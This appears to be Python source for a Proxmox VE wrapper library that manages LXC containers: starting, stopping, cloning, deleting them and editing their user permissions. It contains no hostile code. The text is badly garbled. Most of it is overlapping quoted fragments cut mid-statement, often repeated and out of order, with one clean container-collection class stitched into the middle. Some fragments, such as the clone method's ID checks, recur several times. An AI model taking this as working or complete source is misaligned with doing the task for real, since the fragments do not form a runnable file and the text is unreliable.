kwargs = {\"newid\": newid,", "list of users with permissions for this container and their roles :return: List", "roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str)", "located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get", "(get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed", "> 999_999_999: raise ValueError(\"ID of container should be an integer between 100 and", "+ self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp", "path] 
def add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Add new", "Resume container WARNING: doesn't appear in Proxmox GUI and probably never works :return:", "= str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers()", "100 or newid > 999_999_999: raise ValueError(\"ID of container should be an integer", ":return: Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) ->", "status info about this container :return: Container info in JSON-like format \"\"\" return", "user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove permission for this container", "users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all permissions", "if name is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) ->", "= str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) -> str: \"\"\"", "-> str: \"\"\" Clone LXC container :param newid: ID of new LXC (integer", "\"\"\" try: newid = int(newid) except ValueError: raise ValueError(\"ID of container should be", "full: bool = True) -> str: \"\"\" Clone LXC container :param newid: ID", "LXC (integer number 100-999999999) :param newnode: New node ID or ProxmoxNode object (optional)", "newid > 999_999_999: raise ValueError(\"ID of container should be an integer between 100", "if full else '0'} if newnode is not None: if isinstance(newnode, ProxmoxNode): newnode", "self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config :return: Container", "Number of seconds to wait (optional) :param force_stop: Whether to stop a container", "raise ValueError(\"ID of container should be an integer between 100 and 
999999999\") newid", "self._vmid, \"forceStop\": '1' if force_stop else '0'} if timeout is not None: kwargs[\"timeout\"]", "to wait (optional) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\":", "wait (optional) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid}", "(unsafely) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return", "kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if full else", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'}", "self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node == other._node", "and 999999999\") if newid < 100 or newid > 999_999_999: raise ValueError(\"ID of", "newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if full else '0'} if newnode", "len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers() return", "container by ID :param vmid: Container ID :return: None \"\"\" vmid = str(vmid)", "user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self):", "_get_containers(self): containers = [] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers +=", "newnode.id kwargs[\"target\"] = newnode if name is not None: kwargs[\"hostname\"] = name return", "for this container :param user: User ID or ProxmoxUser object :param role: String", "'0'} if newnode is not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"]", "if newnode is not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] =", "of container should be an integer between 100 and 999999999\") if newid <", "of task \"\"\" kwargs = {\"node\": self._node, 
\"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self)", "role :return: None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self):", "return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) -> str: \"\"\" Reboot container", "or ProxmoxNode object (optional) :param name: Name of new LXC (optional) :param full:", "integer between 100 and 999999999\") newid = str(newid) kwargs = {\"newid\": newid, \"node\":", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else", "return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if el[\"path\"] and el[\"type\"] ==", "values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str,", "self._node = node @property def id(self) -> str: \"\"\" :return: Unique ID of", "== other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api self._containers: Dict[str,", "= str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if", "isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def", "self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int]) ->", "def node(self) -> ProxmoxNode: \"\"\" :return: Node on which containers is located (get-only)", "if force_stop else '0'} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs)", "\"running\" def is_template(self) -> bool: \"\"\" Whether this 
container is a template :return:", "ProxmoxNode object (optional) :param name: Name of new LXC (optional) :param full: Whether", "ValueError(\"ID of container should be an integer between 100 and 999999999\") if newid", "self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container (unsafely)", "default=True) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\":", "self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users with", ":return: List of tuples of ProxmoxUser objects and string names of roles \"\"\"", "def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config :return: Container config in", "\"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\"", "= {} def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def", "def add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Add new permission", "new LXC (integer number 100-999999999) :param newnode: New node ID or ProxmoxNode object", "of container should be an integer between 100 and 999999999\") newid = str(newid)", "keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return", "delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all permissions for this container", "not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None)", "timeout: Number of seconds to wait (optional) :param force_stop: Whether to stop a", "\"\"\" return self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return: Node on which", "return 
class ProxmoxContainerDict:
    """Dict-like, read-through view of every LXC container across all nodes.

    The internal cache is rebuilt on each access, so results always reflect
    the cluster state at call time.
    """

    def __init__(self, api: APIWrapper):
        self._api = api
        self._containers: Dict[str, ProxmoxContainer] = {}

    def keys(self):
        """Return the view of container IDs (refreshed)."""
        self._get_containers()
        return self._containers.keys()

    def values(self):
        """Return the view of ProxmoxContainer objects (refreshed)."""
        self._get_containers()
        return self._containers.values()

    def items(self):
        """Return the view of (vmid, ProxmoxContainer) pairs (refreshed)."""
        self._get_containers()
        return self._containers.items()

    def remove(self, vmid: Union[str, int]) -> None:
        """
        Remove container by ID
        :param vmid: Container ID
        :return: None
        """
        key = str(vmid)
        self._get_containers()
        self._containers[key].delete()

    def __len__(self):
        self._get_containers()
        return len(self._containers)

    def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer:
        self._get_containers()
        return self._containers[str(key)]

    def __iter__(self):
        self._get_containers()
        return iter(self._containers)

    def __repr__(self):
        self._get_containers()
        return f"<{self.__class__.__name__}: {repr(self._containers)}>"

    def _get_containers(self):
        """Rebuild the vmid -> ProxmoxContainer cache by querying every node."""
        found: Dict[str, ProxmoxContainer] = {}
        for node_id in ProxmoxNodeDict(self._api).keys():
            for entry in self._api.list_containers(node_id):
                cont = ProxmoxContainer(self._api, str(entry["vmid"]), node_id)
                found[cont.id] = cont
        self._containers = found
__repr__(self): return f\"<{self.__class__.__name__}:", "might not be supported) (optional, default=True) :return: ID of cloning task \"\"\" try:", "Unique ID of container (get-only) \"\"\" return self._vmid @property def node(self) -> ProxmoxNode:", "None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def", "is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\"", "Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove permission for this container :param", "-> None: \"\"\" Remove all permissions for this container for all users with", "self._vmid == other._vmid and self._node == other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper):", "vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key:", "self._node, \"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs)", "return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users", "List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users with permissions for this container", "def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key", "el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path]", "Dict[str, Any]: \"\"\" Get detailed config :return: Container config in JSON-like format \"\"\"", "be an integer between 100 and 999999999\") if newid < 100 or newid", "100 and 999999999\") if newid < 100 or newid > 999_999_999: raise ValueError(\"ID", "failed (optional, default=True) :return: ID of task \"\"\" kwargs = {\"node\": self._node, 
\"vmid\":", "newid = str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1'", "roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all", "= self.get_status_report() return \"status\" in config.keys() and config[\"status\"] == \"running\" def is_template(self) ->", ":param full: Whether to make storage unlinked (note that linked might not be", "el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def add_permission(self,", "\"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all permissions for this", "kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this container", "def _get_containers(self): containers = [] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers", "object (optional) :param name: Name of new LXC (optional) :param full: Whether to", "(safely) :param timeout: Number of seconds to wait (optional) :param force_stop: Whether to", "ProxmoxUser], role: str) -> None: \"\"\" Remove permission for this container :param user:", "supported) (optional, default=True) :return: ID of cloning task \"\"\" try: newid = int(newid)", "GUI and probably never works :return: ID of task \"\"\" kwargs = {\"node\":", "(integer number 100-999999999) :param newnode: New node ID or ProxmoxNode object (optional) :param", ":param name: Name of new LXC (optional) :param full: Whether to make storage", "str(cont[\"vmid\"]), node) for cont in resp] self._containers = {cont.id: cont for cont in", "ValueError(\"ID of container should be an integer between 100 and 999999999\") newid =", "import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing import Dict, List, Tuple,", "config[\"template\"] == 1 def clone(self, newid: Union[str, int], newnode: Union[str, 
ProxmoxNode] = None,", "ID of container (get-only) \"\"\" return self._vmid @property def node(self) -> ProxmoxNode: \"\"\"", "{\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'} if timeout is", "f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid ==", "str) -> None: \"\"\" Add new permission for this container :param user: User", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout", "self.get_config() return \"template\" in config.keys() and config[\"template\"] == 1 def clone(self, newid: Union[str,", "{} def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self):", "\"status\" in config.keys() and config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\" Whether", "= user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str,", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int", "-> bool: \"\"\" Whether container is currently running :return: True/False \"\"\" config =", "self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\",", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout is", "Add new permission for this container :param user: User ID or ProxmoxUser object", "and config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\" Whether this container is", "'ProxmoxContainer'): return self._vmid == other._vmid and self._node == other._node class ProxmoxContainerDict: def __init__(self,", "self._api.shutdown_container(**kwargs) def reboot(self, 
timeout: int = None) -> str: \"\"\" Reboot container (safely)", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if", "from ..api import APIWrapper from .nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser", "container for all users with any role :return: None \"\"\" for user, permission", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def", "Reboot container (safely) :param timeout: Number of seconds to wait (optional) :return: ID", "ID of new LXC (integer number 100-999999999) :param newnode: New node ID or", "container WARNING: doesn't appear in Proxmox GUI and probably never works :return: ID", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def", "Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node: str): self._api", "newnode: Union[str, ProxmoxNode] = None, name: str = None, full: bool = True)", "ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status info about", "Whether container is currently running :return: True/False \"\"\" config = self.get_status_report() return \"status\"", "a list of users with permissions for this container and their roles :return:", "New node ID or ProxmoxNode object (optional) :param name: Name of new LXC", "= None, name: str = None, full: bool = True) -> str: \"\"\"", "container (safely) :param timeout: Number of seconds to wait (optional) :return: ID of", "-> str: \"\"\" Stop container (unsafely) :return: ID of task \"\"\" kwargs =", "Remove container by ID :param vmid: Container ID :return: None \"\"\" vmid =", "self.get_status_report() return \"status\" in config.keys() and config[\"status\"] == \"running\" def is_template(self) -> bool:", "APIWrapper from .nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing 
import", "ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values()", "= None) -> str: \"\"\" Reboot container (safely) :param timeout: Number of seconds", ":return: None \"\"\" path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user =", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs)", "config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\"", "str, node: str): self._api = api self._vmid = vmid self._node = node @property", "str: \"\"\" Start container :return: ID of task \"\"\" kwargs = {\"node\": self._node,", "by ID :param vmid: Container ID :return: None \"\"\" vmid = str(vmid) self._get_containers()", "if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\")", "container :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return", "+ self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\",", "self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items()", "Whether to stop a container if shutdown failed (optional, default=True) :return: ID of", "and config[\"template\"] == 1 def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] =", "name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this container :return: ID", "self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop: bool", "start(self) -> str: \"\"\" 
Start container :return: ID of task \"\"\" kwargs =", "permissions for this container for all users with any role :return: None \"\"\"", "container :return: ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) ->", "force_stop: bool = True) -> str: \"\"\" Shutdown container (safely) :param timeout: Number", "== other._vmid and self._node == other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api", "self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self,", "return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop: bool = True) ->", "Node on which containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self)", "None: \"\"\" Remove permission for this container :param user: User ID or ProxmoxUser", "for el in resp if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] ==", "\"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def add_permission(self, user: Union[str,", ":param newid: ID of new LXC (integer number 100-999999999) :param newnode: New node", "of users with permissions for this container and their roles :return: List of", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout is not None:", "stop(self) -> str: \"\"\" Stop container (unsafely) :return: ID of task \"\"\" kwargs", "return len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers()", "self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start container :return: ID of task", "List of tuples of ProxmoxUser objects and string names of roles \"\"\" path", "def items(self): self._get_containers() return self._containers.items() def remove(self, 
vmid: Union[str, int]) -> None: \"\"\"", "return self._vmid == other._vmid and self._node == other._node class ProxmoxContainerDict: def __init__(self, api:", "True/False \"\"\" config = self.get_config() return \"template\" in config.keys() and config[\"template\"] == 1", "\"\"\" Clone LXC container :param newid: ID of new LXC (integer number 100-999999999)", "100 and 999999999\") newid = str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\":", "-> str: \"\"\" Delete this container :return: ID of deleting task \"\"\" return", "= api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys() def", "def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and", "self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\",", "{\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container", "APIWrapper, vmid: str, node: str): self._api = api self._vmid = vmid self._node =", "of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self)", "\"\"\" :return: Node on which containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node)", "user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser],", "{repr(self._containers)}>\" def _get_containers(self): containers = [] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node)", "return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container WARNING: doesn't appear in", "@property def id(self) -> str: \"\"\" :return: Unique ID of container (get-only) \"\"\"", 
"ProxmoxUser objects and string names of roles \"\"\" path = \"/vms/\" + self._vmid", "String name of the role :return: None \"\"\" path = \"/vms/\" + self._vmid", "that linked might not be supported) (optional, default=True) :return: ID of cloning task", "None \"\"\" path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user = user.id", "else '0'} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def", "List, Tuple, Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node:", "None, force_stop: bool = True) -> str: \"\"\" Shutdown container (safely) :param timeout:", "of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start", "remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove permission for this", "= vmid self._node = node @property def id(self) -> str: \"\"\" :return: Unique", "user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Add new permission for this", "between 100 and 999999999\") newid = str(newid) kwargs = {\"newid\": newid, \"node\": self._node,", "containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]:", "config :return: Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self)", "api self._vmid = vmid self._node = node @property def id(self) -> str: \"\"\"", "\"template\" in config.keys() and config[\"template\"] == 1 def clone(self, newid: Union[str, int], newnode:", "shutdown(self, timeout: int = None, force_stop: bool = True) -> str: \"\"\" Shutdown", "container (unsafely) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid}", "should be an integer between 100 and 999999999\") newid = str(newid) kwargs =", "kwargs[\"target\"] = newnode if name is not None: 
kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs)", "= api self._vmid = vmid self._node = node @property def id(self) -> str:", "self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if", "Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node: str): self._api =", ":return: True/False \"\"\" config = self.get_config() return \"template\" in config.keys() and config[\"template\"] ==", "is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\"", "kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) -> str:", "= None, force_stop: bool = True) -> str: \"\"\" Shutdown container (safely) :param", "which containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str,", "None, name: str = None, full: bool = True) -> str: \"\"\" Clone", "\"\"\" Add new permission for this container :param user: User ID or ProxmoxUser", "+ \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all permissions for", "el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser], role:", "return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config :return:", "other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node == other._node class ProxmoxContainerDict: def", "other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer]", ":param vmid: Container ID :return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def", "User ID or ProxmoxUser object :param role: String 
name of the role :return:", "seconds to wait (optional) :return: ID of task \"\"\" kwargs = {\"node\": self._node,", "Proxmox GUI and probably never works :return: ID of task \"\"\" kwargs =", "-> Dict[str, Any]: \"\"\" Get detailed status info about this container :return: Container", "about this container :return: Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid)", "= {\"node\": self._node, \"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"] = str(timeout)", "== \"pve\" and el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser], role: str)", "def shutdown(self, timeout: int = None, force_stop: bool = True) -> str: \"\"\"", "users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str) ->", "\"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def", "cloning task \"\"\" try: newid = int(newid) except ValueError: raise ValueError(\"ID of container", "import ProxmoxUser from typing import Dict, List, Tuple, Any, Union class ProxmoxContainer: def", "= node @property def id(self) -> str: \"\"\" :return: Unique ID of container", "__iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers", "ProxmoxNodeDict from .users import ProxmoxUser from typing import Dict, List, Tuple, Any, Union", "self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str, int]) -> None:", "self._vmid = vmid self._node = node @property def id(self) -> str: \"\"\" :return:", "self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a", "of roles 
\"\"\" path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api,", "detailed status info about this container :return: Container info in JSON-like format \"\"\"", "\"\"\" Delete this container :return: ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid)", "= self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers =", "self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def", "view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users with permissions for", "self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def", "self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return: Node on which containers is", "the role :return: None \"\"\" path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser):", "\"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\" Whether container is currently", "isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if name is not None:", "except ValueError: raise ValueError(\"ID of container should be an integer between 100 and", "for user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def", "in config.keys() and config[\"template\"] == 1 def clone(self, newid: Union[str, int], newnode: Union[str,", "= \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el", "{\"node\": self._node, 
\"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return", "config = self.get_status_report() return \"status\" in config.keys() and config[\"status\"] == \"running\" def is_template(self)", "running :return: True/False \"\"\" config = self.get_status_report() return \"status\" in config.keys() and config[\"status\"]", "Union[str, int], newnode: Union[str, ProxmoxNode] = None, name: str = None, full: bool", "an integer between 100 and 999999999\") if newid < 100 or newid >", "Get a list of users with permissions for this container and their roles", "node: str): self._api = api self._vmid = vmid self._node = node @property def", "unlinked (note that linked might not be supported) (optional, default=True) :return: ID of", "self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop: bool = True)", "or ProxmoxUser object :param role: String name of the role :return: None \"\"\"", "bool = True) -> str: \"\"\" Clone LXC container :param newid: ID of", "self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers =", "__str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node", "of container (get-only) \"\"\" return self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return:", "str: \"\"\" Suspend container WARNING: doesn't appear in Proxmox GUI and probably never", "if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] ==", "bool = True) -> str: \"\"\" Shutdown container (safely) :param timeout: Number of", "ID :param vmid: Container ID :return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete()", "f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = [] for 
node in ProxmoxNodeDict(self._api).keys(): resp =", "def __init__(self, api: APIWrapper, vmid: str, node: str): self._api = api self._vmid =", "None: \"\"\" Remove all permissions for this container for all users with any", "vmid: Union[str, int]) -> None: \"\"\" Remove container by ID :param vmid: Container", "\"pve\" and el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser], role: str) ->", "int = None, force_stop: bool = True) -> str: \"\"\" Shutdown container (safely)", ":return: Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) ->", "return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\"", "str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if full", "id(self) -> str: \"\"\" :return: Unique ID of container (get-only) \"\"\" return self._vmid", "self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container WARNING: doesn't appear in Proxmox", "in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in", "..api import APIWrapper from .nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from", "\"\"\" Remove all 